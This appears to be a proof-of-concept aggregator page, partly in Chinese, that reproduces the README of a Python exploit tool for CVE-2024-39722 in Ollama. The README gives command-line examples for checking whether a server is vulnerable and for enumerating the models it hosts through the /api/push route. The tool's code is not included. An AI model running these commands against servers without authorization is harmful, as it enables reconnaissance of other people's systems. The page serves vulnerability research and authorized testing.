POC详情: b77e83608160e0afafd3fa40b745b7cbdeabb1f9

来源
关联漏洞
标题: Ollama 安全漏洞 (CVE-2024-39722)
描述:Ollama是Ollama开源的一个可以在本地启动并运行的大型语言模型。 Ollama 0.1.46之前版本存在安全漏洞,该漏洞源于api/push路由中存在路径遍历漏洞,导致部署服务器上的文件暴露。
介绍
# Ollama CVE-2024-39722 Exploit Tool

This tool is designed to exploit CVE-2024-39722, a model existence disclosure vulnerability in Ollama versions up to and including 0.1.45. It allows users to check if an Ollama server is vulnerable and attempt to discover existing models on the server. Additionally, it can crawl the official Ollama model library to generate a list of potential models for testing.
[中文](README_zh.md)

## Vulnerability Details

*   **CVE ID:** CVE-2024-39722
*   **Description:** Ollama versions <= 0.1.45 are vulnerable to a model existence disclosure. By sending a specially crafted request to the `/api/push` endpoint, an attacker can determine if a specific model (including custom models not in the public library) exists on the server.
*   **Affected Versions:** <= 0.1.45
*   **CVSS Score:** 7.5 (High)

## Features

*   **Crawl Ollama Model Library:** Fetches the list of models from the official Ollama library (`https://ollama.com/library`).
*   **Version Check:** Checks if the target Ollama server version is vulnerable.
*   **Exploit Vulnerability:** Attempts to discover existing models on a vulnerable Ollama server using a list of known model names.
*   **Multi-threaded Exploitation:** Uses multiple threads for faster model discovery.
*   **Output Results:** Saves crawled models and leaked models to a JSON file.

## Requirements

*   Python 3.x
*   `requests`
*   `lxml`
*   `termcolor`

## Installation

1.  Clone the repository or download the script `CVE_2024_39722.py`.
2.  Install the required Python packages:
    ```bash
    pip install requests lxml termcolor
    ```

## Usage

```bash
python CVE_2024_39722.py [options]
```

### Options

*   `-h, --help`: Show the help message and exit.
*   `-u URL, --url URL`: Target Ollama server URL (e.g., `http://localhost:11434`).
*   `-c, --crawl`: Crawl Ollama models library and save them to `links.json`.
*   `-o OUTPUT, --output OUTPUT`: Output file for results (default: `results.json`).
*   `-t THREADS, --threads THREADS`: Number of threads to use for exploitation (default: 10).
*   `-v, --version-check`: Only check if the target Ollama server is vulnerable based on its version.

### Examples

1.  **Show help:**
    ```bash
    python CVE_2024_39722.py -h
    ```

2.  **Crawl Ollama model library:**
    This will fetch model names from `https://ollama.com/library` and save them to `links.json`.
    ```bash
    python CVE_2024_39722.py --crawl
    ```

3.  **Check if a target server is vulnerable:**
    ```bash
    python CVE_2024_39722.py -u http://localhost:11434 --version-check
    ```

4.  **Exploit a target server:**
    This will first check the server's version. If vulnerable, it will use the `links.json` (crawl if not present or use existing) to test for model existence.
    ```bash
    python CVE_2024_39722.py -u http://localhost:11434
    ```

5.  **Exploit with a specific number of threads:**
    ```bash
    python CVE_2024_39722.py -u http://localhost:11434 -t 20
    ```

6.  **Exploit and save results to a custom file:**
    ```bash
    python CVE_2024_39722.py -u http://localhost:11434 -o discovered_models.json
    ```

## Disclaimer

This tool is intended for educational and authorized security testing purposes only. Do not use it on any system without explicit permission from the owner. The author is not responsible for any misuse or damage caused by this tool.
文件快照

[4.0K] /data/pocs/b77e83608160e0afafd3fa40b745b7cbdeabb1f9 ├── [ 13K] CVE_2024_39722.py ├── [3.3K] README.md └── [3.1K] README_zh.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。